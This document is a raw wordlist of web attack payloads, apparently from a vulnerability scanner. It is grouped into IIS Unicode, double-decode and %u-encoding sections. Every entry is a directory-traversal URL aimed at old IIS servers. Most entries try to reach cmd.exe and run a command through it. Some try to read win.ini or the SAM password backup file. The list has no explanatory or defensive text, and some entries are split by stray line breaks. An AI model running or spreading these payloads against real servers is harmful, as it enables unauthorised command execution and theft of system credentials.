/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c%20dir%20C:\

[/IIS-UNICODE]

[IIS-DECODE]
/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+di

r
/_mem_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+di

r
/_vti_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+di

r
/_vti_cnf/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/a.asp/..%%35%63../..%%35%63../winnt/win.ini
/a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._
/a.asp/..%%35c../..%%35c../winnt/win.ini
/a.asp/..%%35c../..%%35c..\winnt\repair\sam._
/a.asp/..%25%35%63../..%25%35%63../winnt/win.ini
/a.asp/..%25%35%63../..%25%35%63..\winnt\repair\sam._
/a.asp/..%255c../..%255c../winnt/win.ini
/a.asp/..%255c../..%255c..\winnt\repair\sam._
/adsamples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/adsamples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/adsamples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+d

ir
/adsamples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
/bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
/bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c

+dir
/bin/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/cgi/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/cgi/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/cgi/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/cgi/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/cgi/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/cgi/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/cgi/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/cgi/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+di

r
/exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35c../winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/msadc/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/PBServer/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/PBServer/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+di

r
/PBServer/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/PBServer/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
/PBServer/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/Rpc/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/Rpc/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/Rpc/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/Rpc/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
/Rpc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
/Rpc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
/samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/script/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/script/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/script/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/script/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir

/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir

/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir

/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir

/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir

/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir

/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir

/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir

/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:

\
/scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\

[/IIS-DECODE]

[IIS-UTFCODE]
/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe

?/c+dir
/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.

exe?/c+dir
/_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/_mem_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/_mem_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe

?/c+dir
/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/_vti_bin/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.

exe?/c+dir
/_vti_bin/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u002f../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/_vti_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%u005c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/_vti_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe

?/c+dir
/_vti_cnf/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/_vti_cnf/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini
/a.asp/.%u002e/.%u002e/.%u002e/..\winnt\repair\sam._
/a.asp/..%u00255c../..%u00255c../winnt/win.ini
/a.asp/..%u00255c../..%u00255c..\winnt\repair\sam._
/a.asp/..%u002f../..%u002f../winnt/win.ini
/a.asp/..%u002f../..%u002f..\winnt\repair\sam._
/a.asp/..%u005c../..%u005c../winnt/win.ini
/a.asp/..%u005c../..%u005c..\winnt\repair\sam._
/adsamples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.ex

e?/c+dir
/adsamples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/adsamples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/adsamples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/adsamples/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+d

ir
/bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
/bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.

exe?/c+dir
/bin/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/c

md.exe?/c+dir
/bin/scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%u002f../winnt/system32/cmd.exe?/c+dir
/bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/bin/scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
/cgi/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+d

ir
/cgi/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/cgi/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/cgi/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
/cgi/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/cgi/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/cgi/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/cgi/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/cgi/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/cgi/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/exchange/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe

?/c+dir
/exchange/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/exchange/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/exchange/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/exchange/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/msadc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c

+dir
/msadc/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/MSADC/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/msadc/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe

?/c+dir
/msadc/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
/msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/msadc/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/MSADC/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/MSADC/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/msadc/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
/msadc/..%u002f../winnt/system32/cmd.exe?/c+dir
/msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/msadc/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/MSADC/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
/msadc/..%u005c../winnt/system32/cmd.exe?/c+dir
/msadc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/PBServer/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe

?/c+dir
/PBServer/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/PBServer/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/PBServer/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/PBServer/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/PBServer/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
/PBServer/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/PBServer/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
/PBServer/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

/Rpc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+d

ir
/Rpc/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
/Rpc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir

/Rpc/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir

/Rpc/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
/Rpc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir

/Rpc/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
/Rpc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir

